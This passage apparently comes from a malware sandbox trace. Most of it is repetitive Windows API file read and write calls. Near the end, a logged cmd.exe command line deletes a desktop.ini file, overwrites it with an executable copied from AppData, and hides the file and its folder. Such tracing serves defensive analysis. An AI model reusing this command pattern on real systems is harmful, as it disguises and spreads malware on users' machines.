lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.475] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.475] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] GetFileType (hFile=0x4c) returned 0x1 [0136.475] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.475] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.476] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.476] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0136.476] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] 
GetFileType (hFile=0x4c) returned 0x1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.476] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.477] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.477] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | 
out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] GetFileType (hFile=0x4c) returned 0x1 [0136.477] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.477] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, 
lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.478] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.478] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0136.478] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.478] GetFileType (hFile=0x4c) returned 0x1 [0136.478] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.479] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) 
returned 1 [0136.479] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.479] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] GetFileType (hFile=0x4c) returned 0x1 [0136.479] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.479] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.480] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.480] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.480] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.480] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, 
lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.481] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.481] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x32, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] GetFileType (hFile=0x4c) returned 0x1 [0136.481] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.481] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x32, lpOverlapped=0x0) returned 1 [0136.481] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.481] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.481] _close (_FileHandle=4) returned 0 [0136.482] FindNextFileW (in: hFindFile=0xa0ea0, lpFindFileData=0x2ef2e4 | out: lpFindFileData=0x2ef2e4) returned 0 [0136.482] GetLastError () returned 0x12 [0136.482] FindClose (in: hFindFile=0xa0ea0 | out: hFindFile=0xa0ea0) returned 1 [0136.482] _dup2 
(_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0136.483] _close (_FileHandle=3) returned 0 [0136.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.484] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.488] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.488] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.488] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.488] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.488] SetConsoleInputExeNameW () returned 0x1 [0136.488] GetConsoleOutputCP () returned 0x1b5 [0136.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.489] exit (_Code=0) Process: id = "143" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" 
